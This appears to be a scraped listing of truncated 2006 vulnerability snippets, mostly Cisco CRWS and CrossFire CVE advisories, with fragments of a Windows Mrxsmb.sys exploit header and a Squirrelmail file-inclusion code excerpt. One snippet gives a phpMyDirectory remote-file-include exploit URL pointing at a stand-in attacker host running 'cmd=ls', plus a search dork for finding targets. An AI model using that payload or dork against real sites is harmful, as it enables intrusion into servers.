CVE-2006-3595

The default configuration of IOS HTTP server in Cisco Router Web Setup CRWS before 3.3.0 build 31 does not require credentials, which allows remote attackers to access the server with arbitrary privilege levels, aka bug CSCsa78190...

CVE-2006-3595

The default configuration of IOS HTTP server in Cisco Router Web Setup CRWS before 3.3.0 build 31 does not require credentials, which allows remote attackers to access the server with arbitrary privilege levels, aka bug CSCsa78190...

CVE-2006-3595

The CVE refers to Cisco Router Web Setup (CRWS) with the IOS HTTP server, affected in versions prior to 3.3.0 build 31. The issue is that the default configuration does not require credentials, allowing remote attackers to access the server with arbitrary privilege levels (bug CSCsa78190). Connec...

Cisco Router Web Setup (CRWS) contains an insecure default IOS configuration

Overview A vulnerability in the Cisco Router Web Setup CRWS web configuration tool on some Cisco 800 and SOHO series routers may allow remote execution of system-level commands with no authentication. Description Cisco Router Web Setup Tool The Cisco Router Web Setup tool, or CRWS, provides a GUI...

Cisco Router Web Setup Ships with Insecure Default IOS Configuration

THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES TH...

Cisco Router Web Setup weak default security settings

By default it's possible to access IOS Web interface without authentication with highest access security level...

[Full-disclosure] Cisco Security Advisory: Cisco Router Web Setup Ships with Insecure Default IOS Configuration

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Cisco Security Advisory: Cisco Router Web Setup Ships with Insecure Default IOS Configuration Document ID: 70650 Advisory ID: cisco-sa-20060712-crws http://www.cisco.com/warp/public/707/cisco-sa-20060712-crws.shtml Revision 1.0 For Public Release 2006...

Buffer overflow

Buffer overflow in eBay Enhanced Picture Services aka EPUImageControl Class in EUPWALcontrol.dll before 1.0.3.48, as used in Sell Your Item SYI, Setup & Test eBay Enhanced Picture Services, Picture Manager Enhanced Uploader, and CARad.com Add Vehicle, allows remote attackers to execute arbitrary...

Mandrake Linux Security Advisory : gdm (MDKSA-2006:100)

A vulnerability in gdm could allow a user to activate the gdm setup program if the administrator configured a gdm theme that provided a user list. The user could do so by choosing the setup option from the menu, clicking the user list, then entering his own password instead of root's. The updated...

Microsoft Windows XP/2000 - 'Mrxsmb.sys' Local Privilege Escalation (MS06-030)

/////////////////////////////////////////////////////////////////////////////////////// // Mrxsmb.sys XP & 2K Ring0 Exploit 6/12/2005 // Tested on XP SP2 && 2K SP4 // Disable ReadOnly Memory protection // HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\EnforceWriteProtecti...

Squirrelmail local file inclusion

Squirrelmail local file inclusion bug in functions/plugin.php . Tested on the latest 1.4.x version. No authentication needed. if isset$plugins && isarray$plugins foreach $plugins as $name useplugin$name; ... function useplugin $name if fileexistsSMPATH . "plugins/$name/setup.php" includeonceSMPAT...

phpmydir1044.txt

ENGLISH Title : phpMyDirectory = 10.4.4 Multiple Remote File Include Vulnerabilities Dork : "powered by phpmydirectory" Author : ajann greetz : Nukedx,TheHacker Exploit; http://target/path/template/default/footer.php?ROOTPATH=http://yourhost.com/cmd.txt?cmd=ls...

[SA19589] Debian mnogosearch Insecure Password Storage Security Issue

TITLE: Debian mnogosearch Insecure Password Storage Security Issue SECUNIA ADVISORY ID: SA19589 VERIFY ADVISORY: http://secunia.com/advisories/19589/ CRITICAL: Moderately critical IMPACT: Exposure of sensitive information WHERE: Local system OPERATING SYSTEM: Debian GNU/Linux 3.1...

CVE-2006-1236

Buffer overflow in the SetUp function in socket/request.c in CrossFire 1.9.0 allows remote attackers to execute arbitrary code via a long setup sound command, a different vulnerability than CVE-2006-1010...

CVE-2006-1236

Buffer overflow in the SetUp function in socket/request.c in CrossFire 1.9.0 allows remote attackers to execute arbitrary code via a long setup sound command, a different vulnerability than CVE-2006-1010...

DEBIAN-CVE-2006-1236

Buffer overflow in the SetUp function in socket/request.c in CrossFire 1.9.0 allows remote attackers to execute arbitrary code via a long setup sound command, a different vulnerability than CVE-2006-1010...

Buffer overflow

Buffer overflow in the SetUp function in socket/request.c in CrossFire 1.9.0 allows remote attackers to execute arbitrary code via a long setup sound command, a different vulnerability than CVE-2006-1010...

CVE-2006-1236

Buffer overflow in the SetUp function in socket/request.c in CrossFire 1.9.0 allows remote attackers to execute arbitrary code via a long setup sound command, a different vulnerability than CVE-2006-1010...

CVE-2006-1236

Crossfire 1.9.0 is affected by a remote code execution vulnerability in SetUp() (socket/request.c) where a long setup sound command can overflow and allow arbitrary code execution. ExploitDB details illustrate a remote-buffer overflow against crossfire-server 1.9.0. OpenVAS and Debian advisories ...

CVE-2006-1236

Buffer overflow in the SetUp function in socket/request.c in CrossFire 1.9.0 allows remote attackers to execute arbitrary code via a long setup sound command, a different vulnerability than CVE-2006-1010...